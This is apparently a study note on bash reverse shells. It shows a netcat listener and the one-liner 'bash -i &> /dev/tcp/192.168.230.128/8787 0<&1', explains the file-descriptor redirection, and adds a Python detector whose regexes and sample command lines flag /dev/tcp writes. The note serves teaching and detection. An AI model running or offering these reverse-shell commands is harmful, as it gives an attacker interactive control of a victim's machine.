Reverse Shell
===

1. Attacker listened on port 8787

```
nc -lnvp 8787
```

:::spoiler Victim used ``bash``
```
┌──(abby㉿DESKTOP-GQJ3E6V)-[/mnt/c/Users/Abby]
└─$ cat /etc/shells
# /etc/shells: valid login shells
/bin/sh
/usr/bin/sh
/bin/bash
/usr/bin/bash
/bin/rbash
/usr/bin/rbash
/bin/dash
/usr/bin/dash
/usr/bin/tmux
/bin/zsh
/usr/bin/zsh

┌──(abby㉿DESKTOP-GQJ3E6V)-[/mnt/c/Users/Abby]
└─$ bash

┌──(abby㉿DESKTOP-GQJ3E6V)-[/mnt/c/Users/Abby]
└─$ ps -p $$
    PID TTY          TIME CMD
    262 pts/0    00:00:00 bash
```
:::

2. The hacker sneakily had the victim open a socket bound to an interactive bash: the standard output and standard error of that bash were fed into the socket, while whatever the attacker sent was fed into the standard input of the bash, which made the session interactive.

```
bash -i &> /dev/tcp/192.168.230.128/8787 0<&1
```

:::info
``command p>&q`` = ``command p<&q``: duplicate file descriptor q onto file descriptor p.

``command > file 2>&1`` = ``command &> file`` = ``command >& file`` (preferred)
:::

![image](https://hackmd.io/_uploads/BJ7Y6YLpA.png)

3. Then attackers can do anything they want.

---

Ref.

* [/dev/tcp/``host``/``port``](https://blog.csdn.net/lyndon_li/article/details/121447208)
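Seen from the defender's side, the redirection syntax described above is exactly what a process-command-line monitor should look for. The following is an added example, not part of the original note: a small Python classifier run over constructed sample command lines (the hosts and ports in the samples are made up) that extracts the ``/dev/tcp/host/port`` target and rates a record high when a descriptor is written to, or opened read-write on, the pseudo-device, and low when it is only read from.

```python
import re
from typing import Optional, Tuple

# Matches bash's /dev/tcp/<host>/<port> pseudo-device and captures the target.
DEVTCP = re.compile(r"/dev/tcp/(?P<host>[A-Za-z0-9.\-]+)/(?P<port>\d{1,5})")

# Redirections that send data *to* the pseudo-device: '&>', '>&', 'N>', 'N<>'.
# An output or read-write redirection means the shell's output leaves the host.
WRITE_TO_DEVTCP = re.compile(r"(?:&>|>&|\d*<>|\d*>)\s*/dev/tcp/")


def classify(cmdline: str) -> Optional[Tuple[str, int, str]]:
    """Return (host, port, severity) for a command line that uses /dev/tcp,
    or None if the pseudo-device is not referenced with a concrete host/port."""
    target = DEVTCP.search(cmdline)
    if target is None:
        return None
    severity = "high" if WRITE_TO_DEVTCP.search(cmdline) else "low"
    return target.group("host"), int(target.group("port")), severity


# Constructed sample command lines, in the shape a process monitor or shell
# audit log might record them (hosts and ports are made up for this example).
SAMPLE_CMDLINES = [
    "bash -i &> /dev/tcp/192.168.230.128/8787 0<&1",    # the shape of the one-liner above
    "bash -c 'echo hello >/dev/tcp/10.0.0.5/4444'",     # outbound write, still high
    "bash -c 'cat < /dev/tcp/time.example.com/13'",     # read-only use, low
    "grep -r /dev/tcp/ /etc/bash.bashrc",               # mentions the path, no target
    "ls -la /tmp",
]


def scan(cmdlines) -> list:
    """Classify every command line and keep only those that reference /dev/tcp."""
    findings = []
    for line in cmdlines:
        result = classify(line)
        if result is not None:
            findings.append((line, *result))
    return findings


if __name__ == "__main__":
    for line, host, port, severity in scan(SAMPLE_CMDLINES):
        print(f"[{severity.upper():4}] {host}:{port}  <-  {line}")
```

In a real deployment the command lines would come from auditd ``execve`` records or an EDR process feed rather than a static list; the classification logic stays the same.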